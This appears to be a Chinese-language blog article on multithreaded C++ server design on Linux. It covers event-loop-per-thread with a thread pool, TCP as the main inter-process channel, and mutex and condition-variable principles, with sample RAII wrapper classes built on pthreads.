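The event loop represents the thread's main loop. To have a particular thread do some work, register the __timer or IO channel (TCP connection)__ with that thread's loop. A connection with real-time requirements can get a thread of its own; a connection with a large data volume can have a thread to itself and spread the data processing over several other threads; other, minor auxiliary connections can share one thread.

A non-trivial server program generally uses non-blocking IO + IO multiplexing. **Every connection/acceptor is registered with some Reactor; the program has several Reactors, and every thread has at most one Reactor.**

A multithreaded program places a higher demand on the Reactor, namely thread safety. If one thread is allowed to push things into another thread's loop, that loop has to be thread-safe.

**2) Thread pool**
For threads that do pure computation and no IO, however, an event loop is somewhat wasteful. For these I use a complementary scheme, a task queue (TaskQueue) __implemented with a blocking queue__:

blocking_queue<boost::function<void()> > taskQueue; // thread-safe blocking queue

void worker_thread()
{
    while (!quit) {
        boost::function<void()> task = taskQueue.take(); // this blocks
        task(); // production code needs to handle exceptions here
    }
}

Implementing a thread pool this way is particularly easy:
Start a thread pool of size N:
int N = num_of_computing_threads;
for (int i = 0; i < N; ++i) {
    create_thread(&worker_thread); // pseudocode: start a thread
}

Using it is just as simple:
boost::function<void()> task = boost::bind(&Foo::calc, this);
taskQueue.post(task);

These dozen or so lines implement a simple thread pool with a fixed number of threads, roughly equivalent to one particular "configuration" of Java 5's ThreadPoolExecutor. In a real project the code should of course be wrapped in a class, not built on global objects. One more point needs attention: the lifetime of the Foo object. My other post, "When destructors meet multithreading: thread-safe __object callbacks__ in C++", discusses this in detail.

Besides a task queue, blocking_queue<T> can also implement a __producer-consumer queue of data__, where T is a data type, not a **function object**, and the consumer(s) of the queue take data from it and process it. This is more specific than a task queue.

blocking_queue is a powerful tool in multithreaded programming. Its implementation can follow **(Array|Linked)BlockingQueue** in Java 5's util.concurrent; in C++ a deque usually serves as the underlying container. The Java 5 code is very readable and has the same basic structure as the textbook version (1 mutex, 2 condition variables), while being far more robust. If you do not want to implement it yourself, an existing library is the better choice. (I have not used any of the free libraries, so I will not make careless recommendations; anyone interested can try concurrent_queue in Intel Threading Building Blocks.)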
|
||||
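The structure described above (one mutex, two condition variables, worker threads that block in take) can be sketched in plain C with POSIX threads. This is an illustration under assumptions, not the author's blocking_queue: the fixed capacity QUEUE_CAP, the function-pointer task type, and the convention that a task with a NULL function tells one worker to exit are all choices made for the sketch.

```c
#include <pthread.h>
#include <stddef.h>

#define QUEUE_CAP 64                 /* assumption: bounded queue */

typedef void (*task_fn)(void *);
struct task { task_fn fn; void *arg; };

struct task_queue {
    pthread_mutex_t mu;              /* protects items, head, count   */
    pthread_cond_t not_empty;        /* signalled when a task arrives */
    pthread_cond_t not_full;         /* signalled when a slot frees   */
    struct task items[QUEUE_CAP];
    size_t head, count;
};

void queue_init(struct task_queue *q)
{
    pthread_mutex_init(&q->mu, NULL);
    pthread_cond_init(&q->not_empty, NULL);
    pthread_cond_init(&q->not_full, NULL);
    q->head = q->count = 0;
}

/* Append a task; blocks while the queue is full. */
void queue_post(struct task_queue *q, task_fn fn, void *arg)
{
    pthread_mutex_lock(&q->mu);
    while (q->count == QUEUE_CAP)
        pthread_cond_wait(&q->not_full, &q->mu);
    size_t tail = (q->head + q->count) % QUEUE_CAP;
    q->items[tail].fn = fn;
    q->items[tail].arg = arg;
    q->count++;
    pthread_cond_signal(&q->not_empty);
    pthread_mutex_unlock(&q->mu);
}

/* Remove the oldest task; blocks while the queue is empty. */
struct task queue_take(struct task_queue *q)
{
    pthread_mutex_lock(&q->mu);
    while (q->count == 0)
        pthread_cond_wait(&q->not_empty, &q->mu);
    struct task t = q->items[q->head];
    q->head = (q->head + 1) % QUEUE_CAP;
    q->count--;
    pthread_cond_signal(&q->not_full);
    pthread_mutex_unlock(&q->mu);
    return t;
}

/* Worker: run tasks until the stop marker (fn == NULL) is taken. */
void *worker_thread(void *arg)
{
    struct task_queue *q = arg;
    for (;;) {
        struct task t = queue_take(q);
        if (t.fn == NULL)
            break;
        t.fn(t.arg);
    }
    return NULL;
}

/* Example task: add 1 to a counter guarded by its own mutex. */
struct counter { pthread_mutex_t mu; int value; };

void add_one(void *arg)
{
    struct counter *c = arg;
    pthread_mutex_lock(&c->mu);
    c->value++;
    pthread_mutex_unlock(&c->mu);
}
```

A pool of N workers is N calls to pthread_create with worker_thread and the shared queue. To shut it down, post N stop markers and join the threads; because the queue is FIFO, every task posted before the markers is run first.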
|
||||
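===== Summary =====

To sum up, the multithreaded server programming model I recommend is: event loop per thread + thread pool.

* The event loop is used for non-blocking IO and __timers__.
* The thread pool is used for computation, and can be either a **task queue or a producer-consumer queue**.

Writing a server this way needs the support of a **high-quality network library based on the Reactor pattern**. I have only used in-house products, so I cannot compare or recommend the common C++ network libraries on the market, sorry.

How many loops to use, how large the thread pool should be, and similar parameters have to be set according to the application. The basic principle is "__impedance matching__", so that both CPU and IO work efficiently; I will discuss the specific considerations another time.

Thread shutdown is not covered here; it is left for the next blog post, "Anti-patterns in multithreaded programming".

In addition, the program may contain a few **threads that perform special tasks**, such as logging. They are largely invisible to the application, but they must be counted when allocating resources (CPU and IO), so that the capacity of the system is not overestimated.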
|
||||
|
||||
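===== 4 Interprocess and inter-thread communication =====

Linux offers countless forms of interprocess communication (IPC). UNPv2 alone lists pipes, FIFOs, POSIX message queues, shared memory, signals and more, not to mention sockets. There are also many synchronization primitives: mutexes, condition variables, reader-writer locks, __file locks__ (record locking), semaphores and so on.

How to choose? In my experience quality beats quantity: three or four carefully chosen tools fully cover what my work requires, and I know each of them well enough that mistakes are unlikely.

===== 5 Interprocess communication =====

__For interprocess communication my first choice is sockets__ (mainly TCP; I have not used UDP, and I do not consider the Unix domain protocols). Their greatest advantage is that they work across hosts and therefore scale. The system is multi-process anyway, so if one machine lacks capacity, several machines can naturally be used. Spread the processes across machines on the same LAN, change the host:port configuration, and the program keeps working. By contrast, none of the other IPC mechanisms listed above works across machines (__shared memory is the most efficient__, for example, but there is no way to share memory efficiently between two machines), which limits scalability.

In programming terms, a TCP socket and a pipe are both __a file descriptor__ used to send and receive a byte stream, and both support read/write/fcntl/select/poll and so on. The difference is that TCP is bidirectional while a pipe is unidirectional (on Linux), so two-way communication between processes needs two file descriptors, which is inconvenient. Moreover the processes must be related as parent and child to use a pipe. All this limits the use of pipes. Within the byte-stream communication model there is no IPC more natural than sockets/TCP. Pipes do have one classic use, though: when writing a __Reactor/Selector, to wake up select asynchronously__ (or the equivalent poll/epoll call). The Sun JVM does this on Linux.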
|
||||
|
||||
TCP port 是由一个进程独占,且操作系统会自动回收(listening port 和已建立连接的 TCP socket 都是文件描述符,在进程结束时操作系统会关闭所有文件描述符)。这说明,即使程序意外退出,也不会给系统留下垃圾,程序重启之后能比较容易地恢复,而不需要重启操作系统(用跨进程的 mutex 就有这个风险)。还有一个好处,既然 port 是独占的,那么可以防止程序重复启动(后面那个进程抢不到 port,自然就没法工作了),造成意料之外的结果。
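The "exclusive port prevents duplicate start" point can be observed directly. The sketch below assumes Linux, binds to the loopback address only, and does not set SO_REUSEPORT; the helper names listenOnLoopback and boundPort are hypothetical.

```cpp
#include <arpa/inet.h>
#include <cassert>
#include <cerrno>
#include <cstdint>
#include <cstring>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

// Binds and listens on 127.0.0.1:port (port 0 lets the kernel choose).
// Returns the listening fd, or -1 with errno set.
int listenOnLoopback(uint16_t port) {
  const int fd = ::socket(AF_INET, SOCK_STREAM, 0);
  if (fd < 0) return -1;
  sockaddr_in addr;
  std::memset(&addr, 0, sizeof addr);
  addr.sin_family = AF_INET;
  addr.sin_port = htons(port);
  addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
  if (::bind(fd, reinterpret_cast<sockaddr*>(&addr), sizeof addr) != 0 ||
      ::listen(fd, 16) != 0) {
    const int saved = errno;  // close() may overwrite errno
    ::close(fd);
    errno = saved;
    return -1;
  }
  return fd;
}

// Returns the port a listening socket is actually bound to, or 0 on error.
uint16_t boundPort(int fd) {
  sockaddr_in addr;
  socklen_t len = sizeof addr;
  if (::getsockname(fd, reinterpret_cast<sockaddr*>(&addr), &len) != 0) return 0;
  return ntohs(addr.sin_port);
}
```

A second instance that calls listenOnLoopback with the same port gets -1 with errno set to EADDRINUSE and can exit right away instead of running alongside the first.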
|
||||
|
||||
两个进程通过 TCP 通信,如果一个崩溃了,操作系统会关闭连接,这样另一个进程几乎立刻就能感知,可以__快速 failover__。当然,**应用层的心跳**也是必不可少的,我以后在讲服务端的日期与时间处理的时候还会谈到心跳协议的设计。
|
||||
|
||||
与其他 IPC 相比,TCP 协议的一个自然好处是“__可记录可重现__”,tcpdump/Wireshark 是解决两个进程间协议/状态争端的好帮手。
|
||||
|
||||
另外,如果网络库带“连接重试”功能的话,我们可以不要求系统里的进程以特定的顺序启动,任何一个进程都能单独重启,这对开发牢靠的分布式系统意义重大。
|
||||
|
||||
marshal ['mɑ:ʃəl] n. 陆空军元帅, 典礼官, 司仪官 v. 整顿, 配置, ** 汇集**
|
||||
|
||||
使用 TCP 这种__字节流__ (byte stream) 方式通信,会有 marshal/unmarshal 的开销,这要求我们选用合适的**消息格式**,准确地说是** wire format**。这将是我下一篇 blog 的主题,目前我推荐 __Google Protocol Buffers__。
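Because TCP delivers a byte stream with no message boundaries, any wire format needs some framing. The sketch below shows one common convention, a 4-byte big-endian length prefix, purely as an illustration; it is not the Protocol Buffers wire format, and the function names encodeFrame and decodeFrame are hypothetical.

```cpp
#include <arpa/inet.h>
#include <cassert>
#include <cstdint>
#include <cstring>
#include <string>

// Frame layout (an assumption for this sketch): 4-byte big-endian length, then payload.
std::string encodeFrame(const std::string& payload) {
  const uint32_t be = htonl(static_cast<uint32_t>(payload.size()));
  std::string frame(reinterpret_cast<const char*>(&be), sizeof be);
  frame += payload;
  return frame;
}

// Pops one complete frame from the front of *buffer into *payload.
// Returns false (and leaves *buffer untouched) if the frame is still incomplete.
bool decodeFrame(std::string* buffer, std::string* payload) {
  if (buffer->size() < sizeof(uint32_t)) return false;
  uint32_t be = 0;
  std::memcpy(&be, buffer->data(), sizeof be);
  const uint32_t len = ntohl(be);
  if (buffer->size() - sizeof be < len) return false;
  payload->assign(*buffer, sizeof be, len);
  buffer->erase(0, sizeof be + len);
  return true;
}
```

The receiver appends whatever read() returns to its buffer and calls decodeFrame in a loop until it returns false.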
|
||||
|
||||
有人或许会说,具体问题具体分析,如果两个进程在同一台机器,就用共享内存,否则就用 TCP,比如 MS SQL Server 就同时支持这两种通信方式。我问,是否值得为那么一点性能提升而让代码的复杂度大大增加呢?TCP 是__字节流协议__,只能顺序读取,有写缓冲;共享内存是__消息协议__,a 进程填好一块内存让 b 进程来读,基本是“停等”方式。要把这两种方式揉到一个程序里,需要建一个**抽象层**,封装两种 IPC。这会带来不透明性,并且增加测试的复杂度,而且万一通信的某一方崩溃,状态 reconcile 也会比 sockets 麻烦。为我所不取。再说了,你舍得让几万块买来的 SQL Server 和你的程序分享机器资源吗?产品里的数据库服务器往往是独立的高配置服务器,一般不会同时运行其他占资源的程序。
|
||||
|
||||
TCP 本身是个数据流协议,除了直接使用它来通信,还可以在此之上构建 __RPC/REST/SOAP __之类的上层通信协议,这超过了本文的范围。另外,除了点对点的通信之外,应用级的广播协议也是非常有用的,可以方便地构建可观可控的分布式系统。
|
||||
|
||||
本文不具体讲 Reactor 方式下的网络编程,其实这里边有很多值得注意的地方,比如带 back off 的 retry connecting,用优先队列来组织 timer 等等,留作以后分析吧。
|
||||
|
||||
===== 6 线程间同步 =====
|
||||
|
||||
线程同步的四项原则,按重要性排列:
|
||||
|
||||
1. 首要原则是尽量**最低限度地共享对象,减少需要同步的场合**。一个对象能不暴露给别的线程就不要暴露;如果要暴露,优先考虑 immutable 对象;实在不行才暴露可修改的对象,并用同步措施来充分保护它。
|
||||
2. 其次是使用**高级的**__并发编程构件__,如 TaskQueue、Producer-Consumer Queue、CountDownLatch 等等;
|
||||
3. 最后不得已必须使用底层同步原语 (primitives) 时,只用__非递归的互斥器和条件变量__,偶尔用一用读写锁;
|
||||
4. 不自己编写 lock-free 代码,不去凭空猜测“哪种做法性能会更好”,比如 spin lock vs. mutex。
|
||||
|
||||
前面两条很容易理解,这里着重讲一下第 3 条:底层同步原语的使用。
|
||||
|
||||
=== 互斥器 (mutex) ===
|
||||
|
||||
互斥器 (mutex) 恐怕是使用得最多的同步原语,粗略地说,__它保护了临界区__,一个时刻最多只能有一个线程在临界区内活动。(请注意,我谈的是 pthreads 里的 mutex,不是 Windows 里的重量级跨进程 Mutex。)单独使用 mutex 时,我们主要**为了保护共享数据**。我个人的原则是:
|
||||
|
||||
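* __Wrap the mutex with RAII__: creation, destruction, locking, and unlocking.
* Use only non-recursive (that is, non-reentrant) mutexes.
* Never call lock() and unlock() by hand; leave everything to the constructor and destructor of **a Guard object on the stack**, whose lifetime exactly equals the critical section (working out when an object is destroyed is a basic skill for C++ programmers). This guarantees that locking and unlocking happen in the same function, instead of locking in foo() and unlocking somewhere in bar().
* Each time you construct a Guard object, think about the locks already held along the way (up the call stack), to prevent deadlock caused by __inconsistent lock ordering__. Since Guard objects live on the stack, the call stack shows which locks are in use, which is very convenient.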
|
||||
|
||||
次要原则有:
|
||||
|
||||
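* Do not use cross-process mutexes; __use only TCP sockets for inter-process communication__.
* Lock and unlock in the same thread; thread a must not unlock a mutex locked by thread b. (Guaranteed automatically by RAII.)
* Do not forget to unlock. (Guaranteed automatically by RAII.)
* Do not unlock twice. (Guaranteed automatically by RAII.)
* When necessary, consider PTHREAD_MUTEX_ERRORCHECK for debugging.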
|
||||
|
||||
用 RAII 封装这几个操作是通行的做法,这几乎是__ C++ 的标准实践__,后面我会给出具体的代码示例,相信大家都已经写过或用过类似的代码了。Java 里的 synchronized 语句和 C# 的 using 语句也有类似的效果,即保证锁的生效期间等于一个作用域,不会因异常而忘记解锁。
|
||||
|
||||
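Mutex is probably the simplest synchronization primitive; following the principles above, it is almost impossible to misuse. I have never violated these principles myself, and whatever problems came up during coding were quickly found and fixed.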
|
||||
|
||||
== 跑题:非递归的 mutex ==
|
||||
|
||||
谈谈我坚持使用非递归的互斥器的个人想法。
|
||||
|
||||
Mutex 分为__递归 (recursive) 和非递归(non-recursive)__两种,这是 POSIX 的叫法,另外的名字是可重入 (Reentrant) 与非可重入。这两种 mutex 作为线程间 (inter-thread) 的同步工具时没有区别,它们的惟一区别在于:同一个线程可以重复对 recursive mutex 加锁,但是不能重复对 non-recursive mutex 加锁。
|
||||
|
||||
首选非递归 mutex,绝对不是为了性能,而是为了体现设计意图。non-recursive 和 recursive 的性能差别其实不大,因为少用一个计数器,前者略快一点点而已。在同一个线程里多次对 non-recursive mutex 加锁会立刻导致死锁,我认为这是它的优点,能帮助我们思考代码对锁的期求,并且及早(在编码阶段)发现问题。
|
||||
|
||||
毫无疑问 recursive mutex 使用起来要方便一些,因为不用考虑一个线程会自己把自己给锁死了,我猜这也是 Java 和 Windows 默认提供 recursive mutex 的原因。(Java 语言自带的 intrinsic lock 是可重入的,它的 concurrent 库里提供 ReentrantLock,Windows 的 CRITICAL_SECTION 也是可重入的。似乎它们都不提供轻量级的 non-recursive mutex。)
|
||||
|
||||
正因为它方便,recursive mutex 可能会隐藏代码里的一些问题。典型情况是你以为拿到一个锁就能修改对象了,没想到外层代码已经拿到了锁,正在修改(或读取)同一个对象呢。具体的例子:
|
||||
|
||||
#include <vector>

std::vector<Foo> foos;
MutexLock mutex;

void post(const Foo& f)
{
  MutexLockGuard lock(mutex);
  foos.push_back(f);
}

void traverse()
{
  MutexLockGuard lock(mutex);
  for (auto it = foos.begin(); it != foos.end(); ++it) { // uses the new C++0x syntax
    it->doit();
  }
}
|
||||
|
||||
post() 加锁,然后修改 foos 对象; traverse() 加锁,然后遍历 foos 数组。将来有一天,Foo::doit() 间接调用了 post() (这在逻辑上是错误的),那么会很有戏剧性的:
|
||||
|
||||
1. Mutex 是非递归的,于是死锁了。
|
||||
2. Mutex 是递归的,由于 push_back 可能(但不总是)导致 vector 迭代器失效,程序偶尔会 crash。
|
||||
|
||||
这时候就能体现 non-recursive 的优越性:把程序的逻辑错误暴露出来。死锁比较容易 debug,把各个线程的调用栈打出来((gdb) thread apply all bt),只要每个函数不是特别长,很容易看出来是怎么死的。(另一方面支持了函数不要写过长。)或者可以用 PTHREAD_MUTEX_ERRORCHECK 一下子就能找到错误(前提是 MutexLock 带 debug 选项。)
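As a small illustration of the PTHREAD_MUTEX_ERRORCHECK option mentioned above: with an error-checking mutex, a second lock attempt by the owning thread returns EDEADLK instead of hanging. The function name relockErrorCheckMutex is hypothetical, and return values of the setup calls are ignored here for brevity.

```cpp
#include <cassert>
#include <cerrno>
#include <pthread.h>

// Locks an error-checking mutex twice from the same thread and
// returns the result of the second attempt.
int relockErrorCheckMutex() {
  pthread_mutexattr_t attr;
  pthread_mutexattr_init(&attr);
  pthread_mutexattr_settype(&attr, PTHREAD_MUTEX_ERRORCHECK);

  pthread_mutex_t m;
  pthread_mutex_init(&m, &attr);
  pthread_mutexattr_destroy(&attr);

  pthread_mutex_lock(&m);
  const int rc = pthread_mutex_lock(&m);  // reports the self-deadlock instead of blocking

  pthread_mutex_unlock(&m);
  pthread_mutex_destroy(&m);
  return rc;
}
```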
|
||||
|
||||
程序反正要死,不如死得有意义一点,让验尸官的日子好过些。
|
||||
|
||||
如果一个函数既可能在已加锁的情况下调用,又可能在未加锁的情况下调用,那么就拆成两个函数:
|
||||
|
||||
1. 跟原来的函数同名,函数加锁,转而调用第 2 个函数。
|
||||
|
||||
2. 给函数名加上后缀 WithLockHold,不加锁,把原来的函数体搬过来。
|
||||
|
||||
就像这样:
|
||||
|
||||
// This function exists to make the author's intent explicit,
// even though the push_back could simply be inlined by hand.
void postWithLockHold(const Foo& f)
{
  foos.push_back(f);
}

void post(const Foo& f)
{
  MutexLockGuard lock(mutex);
  postWithLockHold(f); // no need to worry about overhead; the compiler will normally inline it
}
|
||||
|
||||
这有可能出现两个问题(感谢水木网友 ilovecpp 提出):a) 误用了加锁版本,死锁了。b) 误用了不加锁版本,数据损坏了。
|
||||
|
||||
对于 a),仿造前面的办法能比较容易地排错。对于 b),如果 pthreads 提供 isLocked() 就好办,可以写成:
|
||||
|
||||
void postWithLockHold(const Foo& f)
{
  assert(mutex.isLocked()); // only a wish for now: pthreads offers no such call
  // ...
}
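Since pthreads has no isLocked(), one way to approximate the wish above is to let the mutex wrapper remember which thread holds it. The following is a sketch under assumptions, not the author's MutexLock: the names OwnerTrackingMutex, isLockedByThisThread, items, push, and pushWithLockHold are hypothetical, and C++11 std::mutex and std::atomic are used for brevity.

```cpp
#include <atomic>
#include <cassert>
#include <mutex>
#include <thread>
#include <vector>

// Hypothetical mutex wrapper that records the owning thread.
class OwnerTrackingMutex {
 public:
  OwnerTrackingMutex() : holder_(std::thread::id()) {}

  void lock() {
    mutex_.lock();
    holder_.store(std::this_thread::get_id());
  }
  void unlock() {
    holder_.store(std::thread::id());  // a default-constructed id means "nobody"
    mutex_.unlock();
  }
  bool isLockedByThisThread() const {
    return holder_.load() == std::this_thread::get_id();
  }

 private:
  std::mutex mutex_;
  std::atomic<std::thread::id> holder_;
};

std::vector<int> items;
OwnerTrackingMutex itemsMutex;

// Must be called with itemsMutex held; the assert documents and checks that.
void pushWithLockHold(int x) {
  assert(itemsMutex.isLockedByThisThread());
  items.push_back(x);
}

void push(int x) {
  std::lock_guard<OwnerTrackingMutex> guard(itemsMutex);
  pushWithLockHold(x);
}
```

The check only runs in debug builds, which matches its purpose: catching misuse of the unlocked variant during development.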
|
||||
|
||||
另外,WithLockHold 这个显眼的后缀也让程序中的误用容易暴露出来。
|
||||
|
||||
C++ 没有 annotation,不能像 Java 那样给 method 或 field 标上 @GuardedBy 注解,需要程序员自己小心在意。虽然这里的办法不能一劳永逸地解决全部多线程错误,但能帮上一点是一点了。
|
||||
|
||||
我还没有遇到过需要使用 recursive mutex 的情况,我想将来遇到了都可以借助 wrapper 改用 non-recursive mutex,代码只会更清晰。
|
||||
|
||||
=== 回到正题 ===
|
||||
|
||||
本文这里只谈了 mutex 本身的正确使用,在 C++ 里多线程编程还会遇到其他很多 race condition,请参考拙作《当析构函数遇到多线程——C++ 中线程安全的对象回调》。请注意这里的 class 命名与那篇文章有所不同。我现在认为 MutexLock 和 MutexLockGuard 是更好的名称。
|
||||
|
||||
性能注脚:Linux 的 pthreads mutex 采用 futex 实现,不必每次加锁解锁都陷入系统调用,效率不错。Windows 的 CRITICAL_SECTION 也是类似。
|
||||
|
||||
=== 条件变量 ===
|
||||
|
||||
条件变量 (condition variable) 顾名思义是__一个或多个线程等待某个布尔表达式为真,即等待别的线程“唤醒”它__。条件变量的学名叫管程 (monitor)。Java Object 内置的 wait(), notify(), notifyAll() 即是条件变量(它们以容易用错著称)。条件变量只有一种正确使用的方式,对于 wait() 端:
|
||||
|
||||
1. 必须与 mutex 一起使用,该布尔表达式的读写需受此 mutex 保护
|
||||
2. 在 mutex 已上锁的时候才能调用 wait()
|
||||
3. 把判断布尔条件和 wait() 放到 while 循环中
|
||||
|
||||
写成代码是:
|
||||
|
||||
#include <cassert>
#include <deque>

MutexLock mutex;
Condition cond(mutex);
std::deque<int> queue;

int dequeue()
{
  MutexLockGuard lock(mutex);
  while (queue.empty()) { // must be a loop; must check the condition before wait()
    cond.wait(); // atomically unlocks the mutex and blocks, so it cannot deadlock with enqueue
  }

  assert(!queue.empty());
  int top = queue.front();
  queue.pop_front();
  return top;
}
|
||||
|
||||
对于 signal/broadcast 端:
|
||||
|
||||
1. 不一定要在 mutex 已上锁的情况下调用 signal (理论上)
|
||||
2. 在 signal 之前一般要修改布尔表达式
|
||||
3. 修改布尔表达式通常要用 mutex 保护(至少用作 full memory barrier)
|
||||
写成代码是:
|
||||
|
||||
void enqueue(int x)
{
  MutexLockGuard lock(mutex);
  queue.push_back(x);
  cond.notify();
}
|
||||
|
||||
上面的 dequeue/enqueue 实际上实现了一个简单的 unbounded BlockingQueue。
|
||||
|
||||
条件变量是非常底层的同步原语,很少直接使用,一般都是用它来实现高层的同步措施,如 BlockingQueue 或 CountDownLatch。
|
||||
|
||||
=== 读写锁与其他 ===
|
||||
|
||||
读写锁 (Reader-Writer lock),读写锁是个优秀的抽象,它明确区分了 read 和 write 两种行为。需要注意的是,reader lock 是可重入的,writer lock 是不可重入(包括不可提升 reader lock)的。这正是我说它“优秀”的主要原因。
|
||||
|
||||
遇到并发读写,如果条件合适,我会用《__借 shared_ptr 实现线程安全的 copy-on-write__》介绍的办法,而不用读写锁。当然这不是绝对的。
|
||||
|
||||
信号量 (Semaphore),我没有遇到过需要使用信号量的情况,无从谈及个人经验。
|
||||
|
||||
说一句大逆不道的话,如果程序里需要解决如“**哲学家就餐**”之类的复杂 IPC 问题,我认为应该首先考察几个设计,为什么线程之间会有如此复杂的资源争抢(一个线程要同时抢到两个资源,一个资源可以被两个线程争夺)?能不能把“想吃饭”这个事情专门交给一个为各位哲学家分派餐具的线程来做,然后每个哲学家等在一个简单的 condition variable 上,到时间了有人通知他去吃饭?从哲学上说,教科书上的解决方案是平权,每个哲学家有自己的线程,自己去拿筷子;我宁愿用集权的方式,用一个线程专门管餐具的分配,让其他哲学家线程拿个号等在食堂门口好了。这样不损失多少效率,却让程序简单很多。虽然 Windows 的 WaitForMultipleObjects 让这个问题 trivial 化,在 Linux 下正确模拟 WaitForMultipleObjects 不是普通程序员该干的。
|
||||
|
||||
=== 封装 MutexLock、MutexLockGuard 和 Condition ===
|
||||
|
||||
本节把前面用到的 MutexLock、MutexLockGuard、Condition classes 的代码列出来,前面两个 classes 没多大难度,后面那个有点意思。
|
||||
|
||||
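MutexLock **encapsulates a critical section**. It is a simple __resource class__ that uses the RAII idiom [CCS:13] to wrap __the creation and destruction of a mutex__. On Windows the critical section is a CRITICAL_SECTION, which is reentrant; on Linux it is a pthread_mutex_t, which is non-reentrant by default. A MutexLock is usually a __data member__ of another class.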
|
||||
|
||||
MutexLockGuard 封装**临界区的进入和退出**,即__加锁和解锁__。MutexLockGuard 一般是个**栈上对象**,它的**作用域刚好等于临界区域**。
|
||||
|
||||
这两个 classes 应该能在纸上默写出来,没有太多需要解释的:
|
||||
|
||||
#include <pthread.h>
#include <boost/noncopyable.hpp>

class MutexLock : boost::noncopyable
{
 public:
  MutexLock() // to save space, one-line functions are not indented properly
  { pthread_mutex_init(&mutex_, NULL); }

  ~MutexLock()
  { pthread_mutex_destroy(&mutex_); }

  void lock() // not normally called directly by user code
  { pthread_mutex_lock(&mutex_); }

  void unlock() // not normally called directly by user code
  { pthread_mutex_unlock(&mutex_); }

  pthread_mutex_t* getPthreadMutex() // for Condition only; never call this yourself
  { return &mutex_; }

 private:
  pthread_mutex_t mutex_;
};
|
||||
|
||||
|
||||
class MutexLockGuard : boost::noncopyable
{
 public:
  explicit MutexLockGuard(MutexLock& mutex) : mutex_(mutex)
  { mutex_.lock(); }

  ~MutexLockGuard()
  { mutex_.unlock(); }

 private:
  MutexLock& mutex_;
};

#define MutexLockGuard(x) static_assert(false, "missing mutex guard var name")
|
||||
|
||||
注意代码的最后一行定义了一个宏,这个宏的作用是防止程序里出现如下错误:
|
||||
|
||||
void doit()
{
  MutexLockGuard(mutex); // no variable name: **a temporary is created and destroyed at once**, so the critical section is not locked
  // the correct form is MutexLockGuard lock(mutex);
  // critical section
}
|
||||
|
||||
这里 MutexLock 没有提供 trylock() 函数,因为我没有用过它,我想不出什么时候程序需要“试着去锁一锁”,或许我写过的代码太简单了。
|
||||
|
||||
我见过有人把 MutexLockGuard 写成 template,我没有这么做是因为它的模板类型参数只有 MutexLock 一种可能,没有必要随意增加灵活性,于是我人肉把模板具现化 (instantiate) 了。此外一种更激进的写法是,把 lock/unlock 放到 private 区,然后把 Guard 设为 MutexLock 的 friend,我认为在注释里告知程序员即可,另外 check-in 之前的 code review 也很容易发现误用的情况 (grep getPthreadMutex)。
|
||||
|
||||
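This code is not industrial strength: a) The mutex is created with type PTHREAD_MUTEX_DEFAULT rather than the PTHREAD_MUTEX_NORMAL we intend (in practice the two are very likely the same); the strict approach is to specify the mutex type explicitly with a mutexattr. b) Return values are not checked. assert cannot be used for this, because assert is a no-op in a release build. The point of checking return values is to catch resource exhaustion such as ENOMEM, which generally only happens in heavily loaded production programs. Once such an error occurs, the program must clean up and exit on its own immediately; otherwise it will crash mysteriously and make the post-mortem difficult. What we need here is a non-debug assert; perhaps CHECK() from google-glog is a good approach.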
|
||||
|
||||
以上两点改进留作练习。
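One possible shape of these two improvements is sketched below. It is only an illustration: the macro CHECK_PTHREAD and the class CheckedMutex are hypothetical names, and aborting on failure is an assumption standing in for whatever clean-up-and-exit policy a real program would use.

```cpp
#include <cassert>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <pthread.h>

// Hypothetical always-on check; unlike assert it is not compiled out by NDEBUG.
#define CHECK_PTHREAD(call)                                               \
  do {                                                                    \
    const int rc_ = (call);                                               \
    if (rc_ != 0) {                                                       \
      std::fprintf(stderr, "%s failed: %s\n", #call, std::strerror(rc_)); \
      std::abort();                                                       \
    }                                                                     \
  } while (0)

class CheckedMutex {
 public:
  CheckedMutex() {
    pthread_mutexattr_t attr;
    CHECK_PTHREAD(pthread_mutexattr_init(&attr));
    // a) state the intended type explicitly instead of relying on the default
    CHECK_PTHREAD(pthread_mutexattr_settype(&attr, PTHREAD_MUTEX_NORMAL));
    CHECK_PTHREAD(pthread_mutex_init(&mutex_, &attr));
    CHECK_PTHREAD(pthread_mutexattr_destroy(&attr));
  }
  ~CheckedMutex() { CHECK_PTHREAD(pthread_mutex_destroy(&mutex_)); }

  CheckedMutex(const CheckedMutex&) = delete;
  CheckedMutex& operator=(const CheckedMutex&) = delete;

  // b) every return value is checked
  void lock() { CHECK_PTHREAD(pthread_mutex_lock(&mutex_)); }
  void unlock() { CHECK_PTHREAD(pthread_mutex_unlock(&mutex_)); }

 private:
  pthread_mutex_t mutex_;
};
```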
|
||||
|
||||
Condition class 的实现有点意思。
|
||||
|
||||
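Pthreads condition variables allow the mutex to be specified at wait() time, but I cannot think of any reason for one condition variable to be used with different mutexes. Neither Java's intrinsic condition nor its Condition class supports this, so I think this flexibility can be given up in favor of a plain one-to-one pairing. In contrast, boost::thread's condition_variable takes the mutex at wait time; have a look at the sprawling design of its synchronization primitives: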
|
||||
|
||||
* Four concepts: Lockable, TimedLockable, SharedLockable, UpgradeLockable.
* Five or six kinds of lock: lock_guard, unique_lock, shared_lock, upgrade_lock, upgrade_to_unique_lock, scoped_try_lock.
* Seven kinds of mutex: mutex, try_mutex, timed_mutex, recursive_mutex, recursive_try_mutex, recursive_timed_mutex, shared_mutex.
|
||||
|
||||
恕我愚钝,见到 boost::thread 这样如 Rube Goldberg Machine 一样“灵活”的库我只得三揖绕道而行。这些 class 名字也很无厘头,为什么不老老实实用 reader_writer_lock 这样的通俗名字呢?非得增加精神负担,自己发明新名字。我不愿为这样的灵活性付出代价,宁愿自己做几个简简单单的一看就明白的 classes 来用,这种简单的几行代码的轮子造造也无妨。提供灵活性固然是本事,然而在不需要灵活性的地方把代码写死,更需要大智慧。
|
||||
|
||||
下面这个 Condition 简单地封装了 pthread cond var,用起来也容易,见本节前面的例子。这里我用 notify/notifyAll 作为函数名,因为 signal 有别的含义,C++ 里的 signal/slot,C 里的 signal handler 等等。就别 overload 这个术语了。
|
||||
|
||||
class Condition : boost::noncopyable
{
 public:
  explicit Condition(MutexLock& mutex) : mutex_(mutex)
  { pthread_cond_init(&pcond_, NULL); }

  ~Condition()
  { pthread_cond_destroy(&pcond_); }

  void wait()
  { pthread_cond_wait(&pcond_, mutex_.getPthreadMutex()); }

  void notify()
  { pthread_cond_signal(&pcond_); }

  void notifyAll()
  { pthread_cond_broadcast(&pcond_); }

 private:
  MutexLock& mutex_;
  pthread_cond_t pcond_;
};
|
||||
|
||||
